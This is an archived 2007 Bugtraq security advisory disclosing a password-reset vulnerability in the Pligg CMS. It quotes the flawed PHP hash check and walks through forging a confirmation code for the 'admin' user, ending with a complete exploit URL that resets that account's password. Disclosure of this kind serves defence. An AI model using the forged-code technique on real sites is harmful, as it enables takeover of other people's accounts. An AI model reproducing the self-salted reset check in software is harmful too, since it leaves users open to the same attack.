lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 25 May 2007 15:03:51 +0200
From: "242th section" <242th.section@...il.com>
To: bugtraq@...urityfocus.com
Subject: Pligg critical vulnerability

Pligg critical vulnerability

Concerned version  : 9.5 and ?

Description :

Pligg is a flexible CMS based on PHP and MYSQL.

To reinitialize a forgotten password, Pligg follows a classical
process. A confirmation code is generated and sent by email to the
concerned user mail box. The user has to follow the link containing
the confirmation code and if the confirmation code is checked
successfully, the password is reinitialized to a pre-defined value.


you can find a part of the source code in charge of this check below :


WEB_ROOT/libs/html1.php


[…]

function generateHash($plainText, $salt = null){

    if ($salt === null) {

        $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); }

    else {

        $salt = substr($salt, 0, SALT_LENGTH);

        }

    return $salt . sha1($salt . $plainText);

}

[…]



WEB_ROOT/login.php :


[…]

$confirmationcode = $_GET["confirmationcode"];

if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
== $confirmationcode){

$db->query('UPDATE `' . table_users . '` SET `user_pass` =
"033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`
= "'.$username.'"');

[…]



Unfortunately, as you can read, you can easily generate, for a given
username, a confirmation code that passes successfully the following
check "if(generateHash($username, substr($confirmationcode, 0,
SALT_LENGTH)) == $confirmationcode)"


Example :


Let's choose :
salt = 123456789

and,

username = admin

 we have :

sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and  thus :

confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

with the following url you can reinitialize the user admin password :


http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7


242th.section.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ